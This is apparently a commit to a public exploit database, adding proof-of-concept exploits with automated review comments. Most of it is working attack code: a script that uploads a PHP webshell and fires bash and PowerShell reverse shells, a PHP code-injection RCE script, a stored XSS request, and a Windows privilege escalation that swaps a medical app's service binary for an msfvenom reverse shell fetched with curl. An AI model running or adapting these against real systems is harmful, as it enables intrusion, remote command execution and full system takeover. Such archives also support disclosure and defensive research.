DB: 2021-12-02
4 changes to exploits/shellcodes: MilleGPG5 5.7.2 Luglio 2021 - Local Privilege Escalation; Online Enrollment Management System in PHP and PayPal 1.0 - 'U_NAME' Stored Cross-Site Scripting; Advanced Comment System 1.0 - Remote Command Execution (RCE)
parent
ebf638ee1a
commit
1abdd81300
5 changed files with 268 additions and 13 deletions
|
@ -49,11 +49,8 @@ class Exploit:
|
||||||
|
|
||||||
}
|
}
|
||||||
|
|
||||||
#Creates user "bypass" and upload a simple webshell without
|
#Creates user "bypass" and upload a simple webshell without authentication
|
||||||
authentication
|
request = self.session.post(url,data=data,headers=self.headers,files={"image":(self.shell_name +'.php',"<?=`$_GET[cmd]`?>")})
|
||||||
request = self.session.post(url,
|
|
||||||
data=data,headers=self.headers,files={"image":(self.shell_name
|
|
||||||
+'.php',"<?=`$_GET[cmd]`?>")})
|
|
||||||
time.sleep(3)
|
time.sleep(3)
|
||||||
if (request.status_code == 200):
|
if (request.status_code == 200):
|
||||||
print('[*] The user and webshell were created\n')
|
print('[*] The user and webshell were created\n')
|
||||||
|
@ -69,8 +66,7 @@ data=data,headers=self.headers,files={"image":(self.shell_name
|
||||||
|
|
||||||
#Use a payload in bash to get a reverse shell
|
#Use a payload in bash to get a reverse shell
|
||||||
payload = 'bash+-c+"bash+-i+>%26+/dev/tcp/'+self.LHL+'+0>%261"'
|
payload = 'bash+-c+"bash+-i+>%26+/dev/tcp/'+self.LHL+'+0>%261"'
|
||||||
execute_command =
|
execute_command = self.target+'/uploadImage/Profile/'+self.shell_name+'.php?cmd='+payload
|
||||||
self.target+'/uploadImage/Profile/'+self.shell_name+'.php?cmd='+payload
|
|
||||||
|
|
||||||
try:
|
try:
|
||||||
request_rce = requests.get(execute_command)
|
request_rce = requests.get(execute_command)
|
||||||
|
@ -86,11 +82,9 @@ self.target+'/uploadImage/Profile/'+self.shell_name+'.php?cmd='+payload
|
||||||
time.sleep(3)
|
time.sleep(3)
|
||||||
|
|
||||||
#Use a payload in powershell to get a reverse shell
|
#Use a payload in powershell to get a reverse shell
|
||||||
payload =
|
payload = """powershell+-nop+-c+"$client+%3d+New-Object+System.Net.Sockets.TCPClient("""+self.HPW+""")%3b$stream+%3d+$client.GetStream()%3b[byte[]]$bytes+%3d+0..65535|%25{0}%3bwhile(($i+%3d+$stream.Read($bytes,+0,+$bytes.Length))+-ne+0)
|
||||||
"""powershell+-nop+-c+"$client+%3d+New-Object+System.Net.Sockets.TCPClient("""+self.HPW+""")%3b$stream+%3d+$client.GetStream()%3b[byte[]]$bytes+%3d+0..65535|%25{0}%3bwhile(($i+%3d+$stream.Read($bytes,+0,+$bytes.Length))+-ne+0)
|
|
||||||
{%3b$data+%3d+(New-Object+-TypeName+System.Text.ASCIIEncoding).GetString($bytes,0,+$i)%3b$sendback+%3d+(iex+$data+2>%261+|+Out-String+)%3b$sendback2+%3d+$sendback+%2b+'PS+'+%2b+(pwd).Path+%2b+'>+'%3b$sendbyte+%3d+([text.encoding]%3a%3aASCII).GetBytes($sendback2)%3b$stream.Write($sendbyte,0,$sendbyte.Length)%3b$stream.Flush()}%3b$client.Close()"""""
|
{%3b$data+%3d+(New-Object+-TypeName+System.Text.ASCIIEncoding).GetString($bytes,0,+$i)%3b$sendback+%3d+(iex+$data+2>%261+|+Out-String+)%3b$sendback2+%3d+$sendback+%2b+'PS+'+%2b+(pwd).Path+%2b+'>+'%3b$sendbyte+%3d+([text.encoding]%3a%3aASCII).GetBytes($sendback2)%3b$stream.Write($sendbyte,0,$sendbyte.Length)%3b$stream.Flush()}%3b$client.Close()"""""
|
||||||
execute_command =
|
execute_command = self.target+'/uploadImage/Profile/'+self.shell_name+'.php?cmd='+payload
|
||||||
self.target+'/uploadImage/Profile/'+self.shell_name+'.php?cmd='+payload
|
|
||||||
|
|
||||||
|
|
||||||
try:
|
try:
|
||||||
|
@ -105,8 +99,7 @@ self.target+'/uploadImage/Profile/'+self.shell_name+'.php?cmd='+payload
|
||||||
|
|
||||||
|
|
||||||
def get_args():
|
def get_args():
|
||||||
parser = argparse.ArgumentParser(description='Laundry Booking
|
parser = argparse.ArgumentParser(description='Laundry Booking Management System')
|
||||||
Management System')
|
|
||||||
parser.add_argument('-t', '--target', dest="target", required=True,
|
parser.add_argument('-t', '--target', dest="target", required=True,
|
||||||
action='store', help='Target url')
|
action='store', help='Target url')
|
||||||
parser.add_argument('-s', '--shell_name', dest="shell_name",
|
parser.add_argument('-s', '--shell_name', dest="shell_name",
|
||||||
|
|
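Review bot: The comment in the first hunk says the upload request creates the user "bypass" and drops a PHP file, but nothing on the new side records what remains on the target afterwards. A comment above the `self.session.post(...)` call such as `# Artefacts: account "bypass" and <shell_name>.php under /uploadImage/Profile/ - remove both after testing` would give testers a cleanup list and defenders the two things to search for. As a style point, `if (request.status_code == 200):` reads better as `if request.status_code == 200:`. The enclosing method starts and ends outside the hunks shown.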
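--- a/exploits/php/webapps/50557.txt
+++ b/exploits/php/webapps/50557.txt
@@ -0,0 +1,68 @@
+# Exploit Title: Online Enrollment Management System in PHP and PayPal 1.0 - 'U_NAME' Stored Cross-Site Scripting
+# Date: 2021-08-31
+# Exploit Author: Tushar Jadhav
+# Vendor Homepage: https://www.sourcecodester.com/
+# Software Link: https://www.sourcecodester.com/php/12914/online-enrollment-management-system-paypal-payments-phpmysqli.html
+# Version: 1.0
+# Tested on: Windows 11
+# Contact: https://www.linkedin.com/in/tushar-jadhav-7a43b4171/
+# CVE: CVE-2021-40577
+
+=============================================================================================================================
+
+Stored Cross-site scripting(XSS):
+
+Stored attacks are those where the injected script is permanently stored on
+the target servers,
+such as in a database, in a message forum, visitor log, comment field, etc.
+The victim then retrieves the malicious script from the server when it
+requests the stored information.
+Stored XSS is also sometimes referred to as Persistent XSS.
+
+==============================================================================================================================
+
+Attack vector:
+
+This vulnerability can result in the attacker can injecting the XSS payload
+in the User Registration section. Each time the admin login or basic user
+Login in the admin panel, the XSS triggers and attacker can able to steal
+the cookie according to the crafted payload.
+
+===============================================================================================================================
+
+Vulnerable Parameters: Name
+
+===============================================================================================================================
+
+Steps for reproducing:
+
+1. Go to add users section
+2. fill in the details. & put <script>alert(document.cookie)</script>
+payload in Name parameter.
+3. Once we click on save, We can see the XSS has been triggered.
+
+================================================================================================================================
+
+Request :
+
+POST /onlineenrolmentsystem/admin/user/controller.php?action=add HTTP/1.1
+Host: 192.168.1.205:81
+Content-Length: 133
+Cache-Control: max-age=0
+Upgrade-Insecure-Requests: 1
+Origin: http://192.168.1.205:81
+Content-Type: application/x-www-form-urlencoded
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36
+(KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
+Accept:
+text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
+Referer:
+http://192.168.1.205:81/onlineenrolmentsystem/admin/user/index.php?view=add
+Accept-Encoding: gzip, deflate
+Accept-Language: en-GB,en-US;q=0.9,en;q=0.8
+Cookie: PHPSESSID=uonlna5pmhqh9shnj8t6oqc2g3
+Connection: close
+
+deptid=&U_NAME=%3Cscript%3Ealert%28window.origin%29%3C%2Fscript%3E&deptid=&U_USERNAME=test&deptid=&U_PASS=root&U_ROLE=Registrar&save=
+
+===================================================================================================================================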
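Review bot: The write-up names the vulnerable parameter as `Name`, while the title and the captured request use `U_NAME`, and step 2 shows `alert(document.cookie)` where the request body carries `alert(window.origin)`; the parameter line should read `Vulnerable Parameters: U_NAME` and the two payloads should match. There is no remediation section: one line saying that `U_NAME` has to be HTML-encoded wherever the admin panel renders it, and that the session cookie should be marked HttpOnly, would tell a maintainer what to fix. The captured request also carries a concrete `PHPSESSID` value and `U_PASS=root`, which are better replaced with placeholders.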
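--- a/exploits/php/webapps/50559.py
+++ b/exploits/php/webapps/50559.py
@@ -0,0 +1,65 @@
+# Exploit Title: Advanced Comment System 1.0 - Remote Command Execution (RCE)
+# Date: November 30, 2021
+# Exploit Author: Nicole Daniella Murillo Mejias
+# Version: Advanced Comment System 1.0
+# Tested on: Linux
+
+#!/usr/bin/env python3
+
+# DESCRIPTION:
+# Commands are Base64 encoded and sent via POST requests to the vulnerable application, the
+# response is filtered by the randomly generated alphanumeric string and only command output
+# is displayed.
+#
+# USAGE:
+# Execute the script and pass the command to execute as arguments, they can be quoted or unquoted
+# If any special characters are used, they should be quoted with single quotes.
+#
+# Example:
+#
+# python3 acspoc.py uname -a
+# python3 acspoc.py 'bash -i >& /dev/tcp/127.0.0.1/4444 0>&1'
+
+import sys
+import base64
+import requests
+import random
+
+def generate_string(size):
+str = "ABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789"
+return ''.join(random.choice(str) for i in range(size))
+
+def exploit(cmd):
+
+# TODO: Change the URL to the target host
+url = 'http://127.0.0.1/advanced_comment_system/index.php'
+
+headers = {'Content-Type': 'application/x-www-form-urlencoded'}
+
+encoded_cmd = base64.b64encode(cmd)
+
+delimiter = generate_string(6).encode()
+
+body = b'ACS_path=php://input%00&cbcmd='
+body += encoded_cmd
+body += b'&<?php echo " '
+body += delimiter
+body += b': ".shell_exec(base64_decode($_REQUEST["cbcmd"])); die ?>'
+
+try:
+result = requests.post(url=url, headers=headers, data=body)
+except KeyboardInterrupt:
+print("Keyboard interrupt detected.")
+sys.exit()
+
+if f'{delimiter.decode()}: ' in result.text:
+position = result.text.find(f"{delimiter.decode()}:") + len(f"{delimiter.decode()}: ")
+
+if len(result.text[position:]) > 0:
+print(result.text[position:])
+else:
+print(f"No output from command '{cmd.decode()}'")
+print(f"Response size from target host: {len(result.text)} bytes")
+
+if __name__ == "__main__":
+exploit(' '.join(sys.argv[1:]).encode())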
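Review bot: `#!/usr/bin/env python3` sits on line 7 of the new file, below the header comments, so it is not treated as a shebang even though the file is committed as executable; it has to be the first line of the file. In `generate_string`, `str = "ABC…"` shadows the builtin and is better named `alphabet`. The header omits the Vendor Homepage and Software Link fields that the other entries in this commit carry, so a reader cannot tell which product and download is affected. A sentence in the DESCRIPTION noting that the request is recognisable by a POST body that sets `ACS_path` to `php://input%00` would give defenders something to match on, bearing in mind that request bodies are often not logged.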
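--- a/exploits/windows/local/50558.txt
+++ b/exploits/windows/local/50558.txt
@@ -0,0 +1,126 @@
+# Exploit Title: MilleGPG5 5.7.2 Luglio 2021 (x64) - Local Privilege Escalation
+# Date: 2021-07-19
+# Author: Alessandro 'mindsflee' Salzano
+# Vendor Homepage: https://millegpg.it/
+# Software Homepage: https://millegpg.it/
+# Software Link: https://www.millegpg.it/download/MilleGPGInstall.exe
+# Version: 5.7.2
+# Tested on: Microsoft Windows 10 Enterprise x64
+
+MilleGPG5 is a Class 1 Medical Device registered with "Ministero della Salute".
+
+Vendor: Millennium S.r.l. / Dedalus Group / Dedalus Italia S.p.a.
+
+Affected version: MilleGPG5 5.7.2
+
+# Details
+# By default the Authenticated Users group has the modify permission to MilleGPG5 folders/files as shown below.
+# A low privilege account is able to rename the mysqld.exe file located in bin folder and replace
+# with a malicious file that would connect back to an attacking computer giving system level privileges
+# (nt authority\system) due to the service running as Local System.
+# While a low privilege user is unable to restart the service through the application, a restart of the
+# computer triggers the execution of the malicious file.
+
+(1) Impacted services.
+Any low privileged user can elevate their privileges abusing these services:
+
+C:\Program Files\MilleGPG5\MariaDB\bin\mysqld.exe
+C:\Program Files\MilleGPG5\GPGService.exe
+
+
+Details:
+
+
+SERVICE_NAME: MariaDB-GPG
+TYPE : 10 WIN32_OWN_PROCESS
+START_TYPE : 2 AUTO_START
+ERROR_CONTROL : 1 NORMAL
+BINARY_PATH_NAME : "C:\Program
+Files\MilleGPG5\MariaDB\bin\mysqld.exe" MariaDB-GPG
+LOAD_ORDER_GROUP :
+TAG : 0
+DISPLAY_NAME : MariaDB-GPG
+DEPENDENCIES :
+SERVICE_START_NAME : LocalSystem
+
+------
+
+SERVICE_NAME: GPGOrchestrator
+TYPE : 10 WIN32_OWN_PROCESS
+START_TYPE : 2 AUTO_START
+ERROR_CONTROL : 1 NORMAL
+BINARY_PATH_NAME : "C:\Program Files\MilleGPG5\GPGService.exe"
+LOAD_ORDER_GROUP :
+TAG : 0
+DISPLAY_NAME : GPG Orchestrator
+DEPENDENCIES :
+SERVICE_START_NAME : LocalSystem
+
+(2) Folder permissions.
+Insecure folders permissions issue:
+
+
+C:\Program Files\MilleGPG5\MariaDB\bin BUILTIN\Users:(I)(OI)(CI)(F)
+NT SERVICE\TrustedInstaller:(I)(F)
+NT
+SERVICE\TrustedInstaller:(I)(CI)(IO)(F)
+NT AUTHORITY\SYSTEM:(I)(F)
+NT
+AUTHORITY\SYSTEM:(I)(OI)(CI)(IO)(F)
+BUILTIN\Administrators:(I)(F)
+BUILTIN\Administrators:(I)(OI)(CI)(IO)(F)
+BUILTIN\Users:(I)(OI)(CI)(IO)(GR,GE)
+CREATOR OWNER:(I)(OI)(CI)(IO)(F)
+APPLICATION PACKAGE
+AUTHORITY\ALL APPLICATION PACKAGES:(I)(RX)
+APPLICATION PACKAGE
+AUTHORITY\ALL APPLICATION PACKAGES:(I)(OI)(CI)(IO)(GR,GE)
+APPLICATION PACKAGE
+AUTHORITY\ALL RESTRICTED APPLICATION PACKAGES:(I)(RX)
+APPLICATION PACKAGE
+AUTHORITY\ALL RESTRICTED APPLICATION PACKAGES:(I)(OI)(CI)(IO)(GR,GE)
+...[SNIP]...
+---------------
+
+C:\Program Files\MilleGPG5 BUILTIN\Users:(OI)(CI)(F)
+NT SERVICE\TrustedInstaller:(I)(F)
+NT SERVICE\TrustedInstaller:(I)(CI)(IO)(F)
+NT AUTHORITY\SYSTEM:(I)(F)
+NT AUTHORITY\SYSTEM:(I)(OI)(CI)(IO)(F)
+BUILTIN\Administrators:(I)(F)
+BUILTIN\Administrators:(I)(OI)(CI)(IO)(F)
+BUILTIN\Users:(I)(RX)
+BUILTIN\Users:(I)(OI)(CI)(IO)(GR,GE)
+CREATOR OWNER:(I)(OI)(CI)(IO)(F)
+APPLICATION PACKAGE AUTHORITY\ALL
+APPLICATION PACKAGES:(I)(RX)
+APPLICATION PACKAGE AUTHORITY\ALL
+APPLICATION PACKAGES:(I)(OI)(CI)(IO)(GR,GE)
+APPLICATION PACKAGE AUTHORITY\ALL RESTRICTED
+APPLICATION PACKAGES:(I)(RX)
+APPLICATION PACKAGE AUTHORITY\ALL RESTRICTED
+APPLICATION PACKAGES:(I)(OI)(CI)(IO)(GR,GE)
+
+
+# Proof of Concept
+
+1. Generate malicious .exe on attacking machine
+msfvenom -p windows/shell_reverse_tcp LHOST=192.168.1.102 LPORT=4242 -f exe > /var/www/html/mysqld_evil.exe
+
+2. Setup listener and ensure apache is running on attacking machine
+nc -lvp 4242
+service apache2 start
+
+3. Download malicious .exe on victim machine
+type on cmd: curl http://192.168.1.102/mysqld_evil.exe -o "C:\Program Files\MilleGPG5\MariaDB\bin\mysqld_evil.exe"
+
+4. Overwrite file and copy malicious .exe.
+Renename C:\Program Files\MilleGPG5\MariaDB\bin\mysqld.exe > mysqld.bak
+Rename downloaded 'mysqld_evil.exe' file in mysqld.exe
+
+5. Restart victim machine
+
+6. Reverse Shell on attacking machine opens
+C:\Windows\system32>whoami
+whoami
+nt authority\system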
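Review bot: The Details block says the Authenticated Users group holds modify permission, but the ACL listings under (2) show `BUILTIN\Users:(I)(OI)(CI)(F)` and `BUILTIN\Users:(OI)(CI)(F)`, i.e. full control for Users; the prose should name the principal and the right that the listing actually shows. The entry has no remediation line: stating that the `BUILTIN\Users` full-control entries on `C:\Program Files\MilleGPG5` and its `MariaDB\bin` subfolder need to be reduced to read and execute would tell an administrator how to close the issue while no fixed installer is available. In step 4, `Renename` is a typo, and the heading says "Overwrite" where the two lines under it describe renames.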
@ -11421,6 +11421,7 @@ id,file,description,date,author,type,platform,port
|
||||||
50517,exploits/windows/local/50517.txt,"Windows MultiPoint Server 2011 SP1 - RpcEptMapper and Dnschade Local Privilege Escalation",1970-01-01,"Marcio Mendes",local,windows,
|
50517,exploits/windows/local/50517.txt,"Windows MultiPoint Server 2011 SP1 - RpcEptMapper and Dnschade Local Privilege Escalation",1970-01-01,"Marcio Mendes",local,windows,
|
||||||
50541,exploits/linux/local/50541.c,"Linux Kernel 5.1.x - 'PTRACE_TRACEME' pkexec Local Privilege Escalation (2)",1970-01-01,"Ujas Dhami",local,linux,
|
50541,exploits/linux/local/50541.c,"Linux Kernel 5.1.x - 'PTRACE_TRACEME' pkexec Local Privilege Escalation (2)",1970-01-01,"Ujas Dhami",local,linux,
|
||||||
50545,exploits/windows/local/50545.txt,"HTTPDebuggerPro 9.11 - Unquoted Service Path",1970-01-01,"Aryan Chehreghani",local,windows,
|
50545,exploits/windows/local/50545.txt,"HTTPDebuggerPro 9.11 - Unquoted Service Path",1970-01-01,"Aryan Chehreghani",local,windows,
|
||||||
|
50558,exploits/windows/local/50558.txt,"MilleGPG5 5.7.2 Luglio 2021 - Local Privilege Escalation",1970-01-01,"Alessandro Salzano",local,windows,
|
||||||
1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",1970-01-01,kralor,remote,windows,80
|
1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",1970-01-01,kralor,remote,windows,80
|
||||||
2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",1970-01-01,RoMaNSoFt,remote,windows,80
|
2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",1970-01-01,RoMaNSoFt,remote,windows,80
|
||||||
5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",1970-01-01,"Marcin Wolak",remote,windows,139
|
5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",1970-01-01,"Marcin Wolak",remote,windows,139
|
||||||
|
@ -44645,3 +44646,5 @@ id,file,description,date,author,type,platform,port
|
||||||
50554,exploits/multiple/webapps/50554.txt,"orangescrum 1.8.0 - 'Multiple' Cross-Site Scripting (XSS) (Authenticated)",1970-01-01,"Hubert Wojciechowski",webapps,multiple,
|
50554,exploits/multiple/webapps/50554.txt,"orangescrum 1.8.0 - 'Multiple' Cross-Site Scripting (XSS) (Authenticated)",1970-01-01,"Hubert Wojciechowski",webapps,multiple,
|
||||||
50555,exploits/php/webapps/50555.txt,"opencart 3.0.3.8 - Sessjion Injection",1970-01-01,"Hubert Wojciechowski",webapps,php,
|
50555,exploits/php/webapps/50555.txt,"opencart 3.0.3.8 - Sessjion Injection",1970-01-01,"Hubert Wojciechowski",webapps,php,
|
||||||
50556,exploits/php/webapps/50556.py,"Laundry Booking Management System 1.0 - Remote Code Execution (RCE)",1970-01-01,"Pablo Santiago",webapps,php,
|
50556,exploits/php/webapps/50556.py,"Laundry Booking Management System 1.0 - Remote Code Execution (RCE)",1970-01-01,"Pablo Santiago",webapps,php,
|
||||||
|
50557,exploits/php/webapps/50557.txt,"Online Enrollment Management System in PHP and PayPal 1.0 - 'U_NAME' Stored Cross-Site Scripting",1970-01-01,"Tushar Jadhav",webapps,php,
|
||||||
|
50559,exploits/php/webapps/50559.py,"Advanced Comment System 1.0 - Remote Command Execution (RCE)",1970-01-01,"Murillo Mejias",webapps,php,
|
||||||
|
|